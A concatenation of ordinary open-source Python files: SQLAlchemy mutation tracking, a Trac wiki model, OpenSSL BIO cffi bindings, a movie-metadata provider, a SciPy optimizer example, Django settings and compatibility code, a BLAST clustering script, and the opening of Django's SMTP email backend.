:meth:`.MutableBase._parents` collection is restored to all ``Point`` objects.
"""
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy import event, types
from sqlalchemy.orm import mapper, object_mapper
from sqlalchemy.util import memoized_property
import weakref
class MutableBase(object):
"""Common base class to :class:`.Mutable` and :class:`.MutableComposite`."""
@memoized_property
def _parents(self):
"""Dictionary of parent object->attribute name on the parent.
This attribute is a so-called "memoized" property. It initializes
itself with a new ``weakref.WeakKeyDictionary`` the first time
it is accessed, returning the same object upon subsequent access.
"""
return weakref.WeakKeyDictionary()
@classmethod
def coerce(cls, key, value):
"""Given a value, coerce it into this type.
By default raises ValueError.
"""
if value is None:
return None
raise ValueError("Attribute '%s' does not accept objects of type %s" % (key, type(value)))
@classmethod
def _listen_on_attribute(cls, attribute, coerce, parent_cls):
"""Establish this type as a mutation listener for the given
mapped descriptor.
"""
key = attribute.key
if parent_cls is not attribute.class_:
return
# rely on "propagate" here
parent_cls = attribute.class_
def load(state, *args):
"""Listen for objects loaded or refreshed.
Wrap the target data member's value with
``Mutable``.
"""
val = state.dict.get(key, None)
if val is not None:
if coerce:
val = cls.coerce(key, val)
state.dict[key] = val
val._parents[state.obj()] = key
def set(target, value, oldvalue, initiator):
"""Listen for set/replace events on the target
data member.
Establish a weak reference to the parent object
on the incoming value, remove it for the one
outgoing.
"""
if not isinstance(value, cls):
value = cls.coerce(key, value)
if value is not None:
value._parents[target.obj()] = key
if isinstance(oldvalue, cls):
oldvalue._parents.pop(target.obj(), None)
return value
def pickle(state, state_dict):
val = state.dict.get(key, None)
if val is not None:
if 'ext.mutable.values' not in state_dict:
state_dict['ext.mutable.values'] = []
state_dict['ext.mutable.values'].append(val)
def unpickle(state, state_dict):
if 'ext.mutable.values' in state_dict:
for val in state_dict['ext.mutable.values']:
val._parents[state.obj()] = key
event.listen(parent_cls, 'load', load, raw=True, propagate=True)
event.listen(parent_cls, 'refresh', load, raw=True, propagate=True)
event.listen(attribute, 'set', set, raw=True, retval=True, propagate=True)
event.listen(parent_cls, 'pickle', pickle, raw=True, propagate=True)
event.listen(parent_cls, 'unpickle', unpickle, raw=True, propagate=True)
class Mutable(MutableBase):
"""Mixin that defines transparent propagation of change
events to a parent object.
See the example in :ref:`mutable_scalars` for usage information.
"""
def changed(self):
"""Subclasses should call this method whenever change events occur."""
for parent, key in self._parents.items():
flag_modified(parent, key)
@classmethod
def associate_with_attribute(cls, attribute):
"""Establish this type as a mutation listener for the given
mapped descriptor.
"""
cls._listen_on_attribute(attribute, True, attribute.class_)
@classmethod
def associate_with(cls, sqltype):
"""Associate this wrapper with all future mapped columns
of the given type.
This is a convenience method that calls ``associate_with_attribute`` automatically.
.. warning::
The listeners established by this method are *global*
to all mappers, and are *not* garbage collected. Only use
:meth:`.associate_with` for types that are permanent to an application,
not with ad-hoc types else this will cause unbounded growth
in memory usage.
"""
def listen_for_type(mapper, class_):
for prop in mapper.iterate_properties:
if hasattr(prop, 'columns'):
if isinstance(prop.columns[0].type, sqltype):
cls.associate_with_attribute(getattr(class_, prop.key))
event.listen(mapper, 'mapper_configured', listen_for_type)
@classmethod
def as_mutable(cls, sqltype):
"""Associate a SQL type with this mutable Python type.
This establishes listeners that will detect ORM mappings against
the given type, adding mutation event trackers to those mappings.
The type is returned, unconditionally as an instance, so that
:meth:`.as_mutable` can be used inline::
Table('mytable', metadata,
Column('id', Integer, primary_key=True),
Column('data', MyMutableType.as_mutable(PickleType))
)
Note that the returned type is always an instance, even if a class
is given, and that only columns which are declared specifically with that
type instance receive additional instrumentation.
To associate a particular mutable type with all occurrences of a
particular type, use the :meth:`.Mutable.associate_with` classmethod
of the particular :meth:`.Mutable` subclass to establish a global
association.
.. warning::
The listeners established by this method are *global*
to all mappers, and are *not* garbage collected. Only use
:meth:`.as_mutable` for types that are permanent to an application,
not with ad-hoc types else this will cause unbounded growth
in memory usage.
"""
sqltype = types.to_instance(sqltype)
def listen_for_type(mapper, class_):
for prop in mapper.iterate_properties:
if hasattr(prop, 'columns'):
if prop.columns[0].type is sqltype:
cls.associate_with_attribute(getattr(class_, prop.key))
event.listen(mapper, 'mapper_configured', listen_for_type)
return sqltype
class _MutableCompositeMeta(type):
def __init__(cls, classname, bases, dict_):
cls._setup_listeners()
return type.__init__(cls, classname, bases, dict_)
class MutableComposite(MutableBase):
"""Mixin that defines transparent propagation of change
events on a SQLAlchemy "composite" object to its
owning parent or parents.
See the example in :ref:`mutable_composites` for usage information.
.. warning::
The listeners established by the :class:`.MutableComposite`
class are *global* to all mappers, and are *not* garbage collected. Only use
:class:`.MutableComposite` for types that are permanent to an application,
not with ad-hoc types else this will cause unbounded growth
in memory usage.
"""
__metaclass__ = _MutableCompositeMeta
def changed(self):
"""Subclasses should call this method whenever change events occur."""
for parent, key in self._parents.items():
prop = object_mapper(parent).get_property(key)
for value, attr_name in zip(
self.__composite_values__(),
prop._attribute_keys):
setattr(parent, attr_name, value)
@classmethod
def _setup_listeners(cls):
"""Associate this wrapper with all future mapped composites
of the given type.
This is a convenience method that calls ``associate_with_attribute`` automatically.
"""
def listen_for_type(mapper, class_):
for prop in mapper.iterate_properties:
if hasattr(prop, 'composite_class') and issubclass(prop.composite_class, cls):
cls._listen_on_attribute(getattr(class_, prop.key), False, class_)
event.listen(mapper, 'mapper_configured', listen_for_type)
|
netjunki/trac-Pygit2 | refs/heads/mergewithbeta1.0 | trac/wiki/model.py | 3 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2003-2009 Edgewall Software
# Copyright (C) 2003-2005 Jonas Borgström <jonas@edgewall.com>
# Copyright (C) 2005 Christopher Lenz <cmlenz@gmx.de>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
#
# Author: Jonas Borgström <jonas@edgewall.com>
# Christopher Lenz <cmlenz@gmx.de>
from __future__ import with_statement
from datetime import datetime
from trac.core import *
from trac.resource import Resource
from trac.util.datefmt import from_utimestamp, to_utimestamp, utc
from trac.util.translation import _
from trac.wiki.api import WikiSystem, validate_page_name
class WikiPage(object):
"""Represents a wiki page (new or existing)."""
realm = 'wiki'
def __init__(self, env, name=None, version=None, db=None):
self.env = env
if isinstance(name, Resource):
self.resource = name
name = self.resource.id
else:
if version:
version = int(version) # must be a number or None
self.resource = Resource('wiki', name, version)
self.name = name
if name:
self._fetch(name, version, db)
else:
self.version = 0
self.text = self.comment = self.author = ''
self.time = None
self.readonly = 0
self.old_text = self.text
self.old_readonly = self.readonly
def _fetch(self, name, version=None, db=None):
if version is not None:
sql = """SELECT version, time, author, text, comment, readonly
FROM wiki WHERE name=%s AND version=%s"""
args = (name, int(version))
else:
sql = """SELECT version, time, author, text, comment, readonly
FROM wiki WHERE name=%s ORDER BY version DESC LIMIT 1"""
args = (name,)
for version, time, author, text, comment, readonly in \
self.env.db_query(sql, args):
self.version = int(version)
self.author = author
self.time = from_utimestamp(time)
self.text = text
self.comment = comment
self.readonly = int(readonly) if readonly else 0
break
else:
self.version = 0
self.text = self.comment = self.author = ''
self.time = None
self.readonly = 0
exists = property(lambda self: self.version > 0)
def delete(self, version=None, db=None):
"""Delete one or all versions of a page.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot delete non-existent page"
with self.env.db_transaction as db:
if version is None:
# Delete a wiki page completely
db("DELETE FROM wiki WHERE name=%s", (self.name,))
self.env.log.info("Deleted page %s", self.name)
else:
# Delete only a specific page version
db("DELETE FROM wiki WHERE name=%s and version=%s",
(self.name, version))
self.env.log.info("Deleted version %d of page %s", version,
self.name)
if version is None or version == self.version:
self._fetch(self.name, None)
if not self.exists:
# Invalidate page name cache
del WikiSystem(self.env).pages
# Delete orphaned attachments
from trac.attachment import Attachment
Attachment.delete_all(self.env, 'wiki', self.name)
# Let change listeners know about the deletion
if not self.exists:
for listener in WikiSystem(self.env).change_listeners:
listener.wiki_page_deleted(self)
else:
for listener in WikiSystem(self.env).change_listeners:
if hasattr(listener, 'wiki_page_version_deleted'):
listener.wiki_page_version_deleted(self)
def save(self, author, comment, remote_addr, t=None, db=None):
"""Save a new version of a page.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
if not validate_page_name(self.name):
raise TracError(_("Invalid Wiki page name '%(name)s'",
name=self.name))
new_text = self.text != self.old_text
if not new_text and self.readonly == self.old_readonly:
raise TracError(_("Page not modified"))
t = t or datetime.now(utc)
with self.env.db_transaction as db:
if new_text:
db("""INSERT INTO wiki (name, version, time, author, ipnr,
text, comment, readonly)
VALUES (%s,%s,%s,%s,%s,%s,%s,%s)
""", (self.name, self.version + 1, to_utimestamp(t),
author, remote_addr, self.text, comment,
self.readonly))
self.version += 1
self.resource = self.resource(version=self.version)
else:
db("UPDATE wiki SET readonly=%s WHERE name=%s",
(self.readonly, self.name))
if self.version == 1:
# Invalidate page name cache
del WikiSystem(self.env).pages
self.author = author
self.comment = comment
self.time = t
for listener in WikiSystem(self.env).change_listeners:
if self.version == 1:
listener.wiki_page_added(self)
else:
listener.wiki_page_changed(self, self.version, t, comment,
author, remote_addr)
self.old_readonly = self.readonly
self.old_text = self.text
def rename(self, new_name):
"""Rename wiki page in-place, keeping the history intact.
Renaming a page this way will eventually leave dangling references
        to the old page - which literally doesn't exist anymore.
"""
assert self.exists, "Cannot rename non-existent page"
if not validate_page_name(new_name):
raise TracError(_("Invalid Wiki page name '%(name)s'",
name=new_name))
old_name = self.name
with self.env.db_transaction as db:
new_page = WikiPage(self.env, new_name)
if new_page.exists:
raise TracError(_("Can't rename to existing %(name)s page.",
name=new_name))
db("UPDATE wiki SET name=%s WHERE name=%s", (new_name, old_name))
# Invalidate page name cache
del WikiSystem(self.env).pages
# Reparent attachments
from trac.attachment import Attachment
Attachment.reparent_all(self.env, 'wiki', old_name, 'wiki',
new_name)
self.name = new_name
self.env.log.info('Renamed page %s to %s', old_name, new_name)
for listener in WikiSystem(self.env).change_listeners:
if hasattr(listener, 'wiki_page_renamed'):
listener.wiki_page_renamed(self, old_name)
def get_history(self, db=None):
"""Retrieve the edit history of a wiki page.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
for version, ts, author, comment, ipnr in self.env.db_query("""
SELECT version, time, author, comment, ipnr FROM wiki
WHERE name=%s AND version<=%s ORDER BY version DESC
""", (self.name, self.version)):
yield version, from_utimestamp(ts), author, comment, ipnr
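# Usage sketch (assuming an initialized Trac ``env``; the page name is
# hypothetical):
# page = WikiPage(env, 'WikiStart')
# if page.exists:
#     for version, ts, author, comment, ipnr in page.get_history():
#         print version, author, comment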
|
jjmleiro/hue | refs/heads/master | desktop/core/ext-py/cryptography-1.3.1/src/_cffi_src/openssl/bio.py | 7 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/bio.h>
"""
TYPES = """
typedef struct bio_st BIO;
typedef void bio_info_cb(BIO *, int, const char *, int, long, long);
struct bio_method_st {
int type;
const char *name;
int (*bwrite)(BIO *, const char *, int);
int (*bread)(BIO *, char *, int);
int (*bputs)(BIO *, const char *);
int (*bgets)(BIO *, char *, int);
long (*ctrl)(BIO *, int, long, void *);
int (*create)(BIO *);
int (*destroy)(BIO *);
long (*callback_ctrl)(BIO *, int, bio_info_cb *);
...;
};
typedef struct bio_method_st BIO_METHOD;
struct bio_st {
BIO_METHOD *method;
long (*callback)(struct bio_st *, int, const char *, int, long, long);
char *cb_arg;
int init;
int shutdown;
int flags;
int retry_reason;
int num;
void *ptr;
struct bio_st *next_bio;
struct bio_st *prev_bio;
int references;
unsigned long num_read;
unsigned long num_write;
...;
};
typedef ... BUF_MEM;
static const int BIO_TYPE_MEM;
static const int BIO_TYPE_FILE;
static const int BIO_TYPE_FD;
static const int BIO_TYPE_SOCKET;
static const int BIO_TYPE_CONNECT;
static const int BIO_TYPE_ACCEPT;
static const int BIO_TYPE_NULL;
static const int BIO_CLOSE;
static const int BIO_NOCLOSE;
static const int BIO_TYPE_SOURCE_SINK;
static const int BIO_CTRL_RESET;
static const int BIO_CTRL_EOF;
static const int BIO_CTRL_SET;
static const int BIO_CTRL_SET_CLOSE;
static const int BIO_CTRL_FLUSH;
static const int BIO_CTRL_DUP;
static const int BIO_CTRL_GET_CLOSE;
static const int BIO_CTRL_INFO;
static const int BIO_CTRL_GET;
static const int BIO_CTRL_PENDING;
static const int BIO_CTRL_WPENDING;
static const int BIO_C_FILE_SEEK;
static const int BIO_C_FILE_TELL;
static const int BIO_TYPE_NONE;
static const int BIO_TYPE_NBIO_TEST;
static const int BIO_TYPE_BER;
static const int BIO_TYPE_BIO;
static const int BIO_TYPE_DESCRIPTOR;
static const int BIO_FLAGS_READ;
static const int BIO_FLAGS_WRITE;
static const int BIO_FLAGS_IO_SPECIAL;
static const int BIO_FLAGS_RWS;
static const int BIO_FLAGS_SHOULD_RETRY;
static const int BIO_TYPE_NULL_FILTER;
static const int BIO_TYPE_SSL;
static const int BIO_TYPE_MD;
static const int BIO_TYPE_BUFFER;
static const int BIO_TYPE_CIPHER;
static const int BIO_TYPE_BASE64;
static const int BIO_TYPE_FILTER;
"""
FUNCTIONS = """
BIO *BIO_new(BIO_METHOD *);
int BIO_set(BIO *, BIO_METHOD *);
int BIO_free(BIO *);
void BIO_vfree(BIO *);
void BIO_free_all(BIO *);
BIO *BIO_push(BIO *, BIO *);
BIO *BIO_pop(BIO *);
BIO *BIO_next(BIO *);
BIO *BIO_find_type(BIO *, int);
BIO_METHOD *BIO_s_mem(void);
BIO_METHOD *BIO_s_file(void);
BIO *BIO_new_file(const char *, const char *);
BIO *BIO_new_fp(FILE *, int);
BIO_METHOD *BIO_s_fd(void);
BIO *BIO_new_fd(int, int);
BIO_METHOD *BIO_s_socket(void);
BIO *BIO_new_socket(int, int);
BIO_METHOD *BIO_s_null(void);
long BIO_ctrl(BIO *, int, long, void *);
long BIO_callback_ctrl(
BIO *,
int,
void (*)(struct bio_st *, int, const char *, int, long, long)
);
long BIO_int_ctrl(BIO *, int, long, int);
size_t BIO_ctrl_pending(BIO *);
size_t BIO_ctrl_wpending(BIO *);
int BIO_read(BIO *, void *, int);
int BIO_gets(BIO *, char *, int);
int BIO_write(BIO *, const void *, int);
int BIO_puts(BIO *, const char *);
BIO_METHOD *BIO_f_null(void);
BIO_METHOD *BIO_f_buffer(void);
"""
MACROS = """
/* BIO_new_mem_buf became const void * in 1.0.2g */
BIO *BIO_new_mem_buf(void *, int);
long BIO_set_fd(BIO *, long, int);
long BIO_get_fd(BIO *, char *);
long BIO_set_mem_eof_return(BIO *, int);
long BIO_get_mem_data(BIO *, char **);
long BIO_set_mem_buf(BIO *, BUF_MEM *, int);
long BIO_get_mem_ptr(BIO *, BUF_MEM **);
long BIO_set_fp(BIO *, FILE *, int);
long BIO_get_fp(BIO *, FILE **);
long BIO_read_filename(BIO *, char *);
long BIO_write_filename(BIO *, char *);
long BIO_append_filename(BIO *, char *);
long BIO_rw_filename(BIO *, char *);
int BIO_should_read(BIO *);
int BIO_should_write(BIO *);
int BIO_should_io_special(BIO *);
int BIO_retry_type(BIO *);
int BIO_should_retry(BIO *);
int BIO_reset(BIO *);
int BIO_seek(BIO *, int);
int BIO_tell(BIO *);
int BIO_flush(BIO *);
int BIO_eof(BIO *);
int BIO_set_close(BIO *,long);
int BIO_get_close(BIO *);
int BIO_pending(BIO *);
int BIO_wpending(BIO *);
int BIO_get_info_callback(BIO *, bio_info_cb **);
int BIO_set_info_callback(BIO *, bio_info_cb *);
long BIO_get_buffer_num_lines(BIO *);
long BIO_set_read_buffer_size(BIO *, long);
long BIO_set_write_buffer_size(BIO *, long);
long BIO_set_buffer_size(BIO *, long);
long BIO_set_buffer_read_data(BIO *, void *, long);
/* The following was a macro in 0.9.8e. Once we drop support for RHEL/CentOS 5
we should move this back to FUNCTIONS. */
int BIO_method_type(const BIO *);
"""
CUSTOMIZATIONS = """
"""
|
darren-rogan/CouchPotatoServer | refs/heads/master | couchpotato/core/providers/movie/themoviedb/main.py | 2 | from couchpotato.core.event import addEvent
from couchpotato.core.helpers.encoding import simplifyString, toUnicode
from couchpotato.core.logger import CPLog
from couchpotato.core.providers.movie.base import MovieProvider
from libs.themoviedb import tmdb
log = CPLog(__name__)
class TheMovieDb(MovieProvider):
def __init__(self):
addEvent('movie.by_hash', self.byHash)
addEvent('movie.search', self.search, priority = 2)
addEvent('movie.info', self.getInfo, priority = 2)
addEvent('movie.info_by_tmdb', self.getInfoByTMDBId)
# Use base wrapper
tmdb.configure(self.conf('api_key'))
def byHash(self, file):
''' Find movie by hash '''
if self.isDisabled():
return False
cache_key = 'tmdb.cache.%s' % simplifyString(file)
results = self.getCache(cache_key)
if not results:
log.debug('Searching for movie by hash: %s', file)
try:
raw = tmdb.searchByHashingFile(file)
results = []
if raw:
try:
results = self.parseMovie(raw)
log.info('Found: %s', results['titles'][0] + ' (' + str(results['year']) + ')')
self.setCache(cache_key, results)
return results
except SyntaxError, e:
log.error('Failed to parse XML response: %s', e)
return False
except:
log.debug('No movies known by hash for: %s', file)
pass
return results
def search(self, q, limit = 12):
''' Find movie by name '''
if self.isDisabled():
return False
search_string = simplifyString(q)
cache_key = 'tmdb.cache.%s.%s' % (search_string, limit)
results = self.getCache(cache_key)
if not results:
log.debug('Searching for movie: %s', q)
raw = tmdb.search(search_string)
results = []
if raw:
try:
nr = 0
for movie in raw:
results.append(self.parseMovie(movie))
nr += 1
if nr == limit:
break
log.info('Found: %s', [result['titles'][0] + ' (' + str(result['year']) + ')' for result in results])
self.setCache(cache_key, results)
return results
except SyntaxError, e:
log.error('Failed to parse XML response: %s', e)
return False
return results
def getInfo(self, identifier = None):
if not identifier:
return {}
cache_key = 'tmdb.cache.%s' % identifier
result = self.getCache(cache_key)
if not result:
result = {}
movie = None
try:
log.debug('Getting info: %s', cache_key)
movie = tmdb.imdbLookup(id = identifier)
except:
pass
if movie:
result = self.parseMovie(movie[0])
self.setCache(cache_key, result)
return result
def getInfoByTMDBId(self, id = None):
cache_key = 'tmdb.cache.%s' % id
result = self.getCache(cache_key)
if not result:
result = {}
movie = None
try:
log.debug('Getting info: %s', cache_key)
movie = tmdb.getMovieInfo(id = id)
except:
pass
if movie:
result = self.parseMovie(movie)
self.setCache(cache_key, result)
return result
def parseMovie(self, movie):
# Images
poster = self.getImage(movie, type = 'poster', size = 'cover')
#backdrop = self.getImage(movie, type = 'backdrop', size = 'w1280')
poster_original = self.getImage(movie, type = 'poster', size = 'original')
backdrop_original = self.getImage(movie, type = 'backdrop', size = 'original')
# Genres
try:
genres = self.getCategory(movie, 'genre')
except:
genres = []
# 1900 is the same as None
year = str(movie.get('released', 'none'))[:4]
if year == '1900' or year.lower() == 'none':
year = None
movie_data = {
'via_tmdb': True,
'tmdb_id': int(movie.get('id', 0)),
'titles': [toUnicode(movie.get('name'))],
'original_title': movie.get('original_name'),
'images': {
'poster': [poster] if poster else [],
#'backdrop': [backdrop] if backdrop else [],
'poster_original': [poster_original] if poster_original else [],
'backdrop_original': [backdrop_original] if backdrop_original else [],
},
'imdb': movie.get('imdb_id'),
'runtime': movie.get('runtime'),
'released': movie.get('released'),
'year': year,
'plot': movie.get('overview', ''),
'tagline': '',
'genres': genres,
}
# Add alternative names
for alt in ['original_name', 'alternative_name']:
alt_name = toUnicode(movie.get(alt))
            if alt_name and alt_name not in movie_data['titles'] and alt_name.lower() != 'none':
movie_data['titles'].append(alt_name)
return movie_data
def getImage(self, movie, type = 'poster', size = 'cover'):
image_url = ''
for image in movie.get('images', []):
if(image.get('type') == type) and image.get(size):
image_url = image.get(size)
break
return image_url
def getCategory(self, movie, type = 'genre'):
cats = movie.get('categories', {}).get(type)
categories = []
for category in cats:
try:
categories.append(category)
except:
pass
return categories
    def isDisabled(self):
        if self.conf('api_key') == '':
            log.error('No API key provided.')
            return True
        else:
            return False
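# Usage sketch (hypothetical wiring; in practice CouchPotato's plugin loader
# instantiates this provider and supplies ``conf``/``getCache`` via the base
# classes):
# provider = TheMovieDb()
# results = provider.search('the matrix', limit = 5)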
|
largelymfs/w2vtools | refs/heads/master | build/scipy/scipy/optimize/tnc/example.py | 95 | #!/usr/bin/env python
# Python TNC example
# @(#) $Jeannot: example.py,v 1.4 2004/04/02 18:51:04 js Exp $
from __future__ import division, print_function, absolute_import
import tnc
# A function to minimize
# Must return a tuple with the function value and the gradient (as a list)
# or None to abort the minimization
def function(x):
f = pow(x[0],2.0)+pow(abs(x[1]),3.0)
g = [0,0]
g[0] = 2.0*x[0]
g[1] = 3.0*pow(abs(x[1]),2.0)
if x[1] < 0:
g[1] = -g[1]
return f, g
# Optimizer call
rc, nf, x = tnc.minimize(function, [-7, 3], [-10, 1], [10, 10])
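# (Reading of the call above, per this example: x0 = [-7, 3],
# lower bounds = [-10, 1], upper bounds = [10, 10] -- the bound x[1] >= 1
# is why the exact value printed below is [0, 1].)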
print("After", nf, "function evaluations, TNC returned:", tnc.RCSTRINGS[rc])
print("x =", x)
print("exact value = [0, 1]")
|
kz26/bang-at-uchicago | refs/heads/master | app/local_settings.py | 1 | # Django settings for app project.
import os
from datetime import timedelta
SITE_ROOT = os.path.dirname(os.path.realpath(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('admin', 'bang@bangatuchicago.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(SITE_ROOT, 'main.sqlite'), # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(SITE_ROOT, 'static'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
'compressor.finders.CompressorFinder'
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'SECRET KEY HERE'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'app.main.middleware.AngularCSRFRename',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'app.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'app.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(SITE_ROOT, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'south', 'rest_framework', 'djcelery', 'compressor',
'app.main',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# Caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '127.0.0.1:11211',
}
}
# Django Compressor
COMPRESS_ENABLED = True
COMPRESS_PRECOMPILERS = (
('text/coffeescript', 'coffee -bcs'),
('text/less', 'lessc {infile} {outfile}'),
)
COMPRESS_ROOT = os.path.join(SITE_ROOT, 'static')
# AngularJS integration
CSRF_COOKIE_NAME = "XSRF-TOKEN"
# Celery
import djcelery
djcelery.setup_loader()
BROKER_URL = "amqp://guest@localhost//"
CELERYBEAT_SCHEDULE = {
'mark_matches_read': {
'task': 'app.main.tasks.mark_matches_read',
'schedule': timedelta(seconds=600)
}
}
# App-specific configuration
LDAP_SERVER = "ldap://ldap.uchicago.edu:389"
LDAP_BASE_DN = "dc=uchicago,dc=edu"
PASSWORD_RESET_EXPIRY = 3600
# Email
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
DEFAULT_FROM_EMAIL = "bang@bangatuchicago.com"
|
gizmag/django-mobile | refs/heads/master | django_mobile/compat.py | 6 | try:
from django.template.engine import Engine
from django.template.loaders.base import Loader as BaseLoader
except ImportError: # Django < 1.8
Engine = None
from django.template.loader import BaseLoader, find_template_loader, get_template_from_string
def template_loader(loader_name):
if Engine:
return Engine.get_default().find_template_loader(loader_name)
else: # Django < 1.8
return find_template_loader(loader_name)
def template_from_string(template_code):
if Engine:
return Engine().from_string(template_code)
else: # Django < 1.8
return get_template_from_string(template_code)
def get_engine():
if Engine:
return Engine.get_default()
else: # Django < 1.8
return None
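# Usage sketch (loader path and template string are illustrative only):
# loader = template_loader('django.template.loaders.filesystem.Loader')
# tmpl = template_from_string('Hello {{ name }}')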
|
Nymeria8/NGS_utilities | refs/heads/master | categorize.py | 1 | #!/usr/bin/python3
# This script was used as part of a redundancy pipeline. It forms groups of homologs when a homology search of sequences against themselves is made; it clusters the sequences by their mutual hits.
# The output is a list of fasta headers, where each cluster is separated by "---\n"
# python categorize.py tabular_blast_output_outfmt6 outfile
from sys import argv
infile = open(argv[1],'r')
outfile=open(argv[2],"w")
title = ""
scaf = set()
scafs = []
for lines in infile:
lines = lines.split()
if lines[0] != title:
title = lines[0]
scafs.append(scaf)
scaf = set()
x=0
size=lines[0].split("e")
if float(size[1])/float(lines[3])<=2.0 and x<=1:
scaf.add(lines[1])
x+=1
else:
size=lines[0].split("e")
if float(size[1])/float(lines[3])<=2.0 and x<=1:
scaf.add(lines[1])
x+=1
scafs.append(scaf)  # append the final group (the original appended the list to itself)
del scafs[0]  # drop the initial empty set
infile.close()
def consolidate(sets):
setlist = [s for s in sets if s]
for i, s1 in enumerate(setlist):
if s1:
for s2 in setlist[i+1:]:
intersection = s1.intersection(s2)
if intersection:
s2.update(s1)
s1.clear()
s1 = s2
return [s for s in setlist if s]
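# Behaviour sketch for consolidate() (hypothetical data): sets that share any
# member are merged transitively.
# consolidate([{'a', 'b'}, {'b', 'c'}, {'d'}]) -> [{'a', 'b', 'c'}, {'d'}]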
for i in consolidate(scafs):
for a in i:
outfile.write(a+"\n")
outfile.write("---\n")
outfile.close()
|
perezg/infoxchange | refs/heads/master | BASE/lib/python2.7/site-packages/django/core/mail/backends/smtp.py | 130 | """SMTP email backend class."""
import smtplib
import ssl
import threading
from django.conf import settings
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.utils import DNS_NAME
from django.core.mail.message import sanitize_address
from django.utils.encoding import force_bytes
class EmailBackend(BaseEmailBackend):
"""
A wrapper that manages the SMTP network connection.
"""
def __init__(self, host=None, port=None, username=None, password=None,
use_tls=None, fail_silently=False, **kwargs):
super(EmailBackend, self).__init__(fail_silently=fail_silently)
self.host = host or settings.EMAIL_HOST
self.port = port or settings.EMAIL_PORT
if username is None:
self.username = settings.EMAIL_HOST_USER
else:
self.username = username
if password is None:
self.password = settings.EMAIL_HOST_PASSWORD
else:
self.password = password
if use_tls is None:
